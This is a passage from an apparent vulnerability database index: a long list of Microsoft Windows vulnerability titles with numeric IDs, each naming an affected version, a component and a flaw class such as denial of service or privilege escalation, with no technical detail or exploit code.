service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE privilege escalation [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4181] Microsoft Windows RPC Processor privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3370] Microsoft Windows RPC Authentication denial of service [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2310] Microsoft Windows 2000 RPC weak authentication [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [900] Microsoft Windows grpconv.exe memory corruption [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] 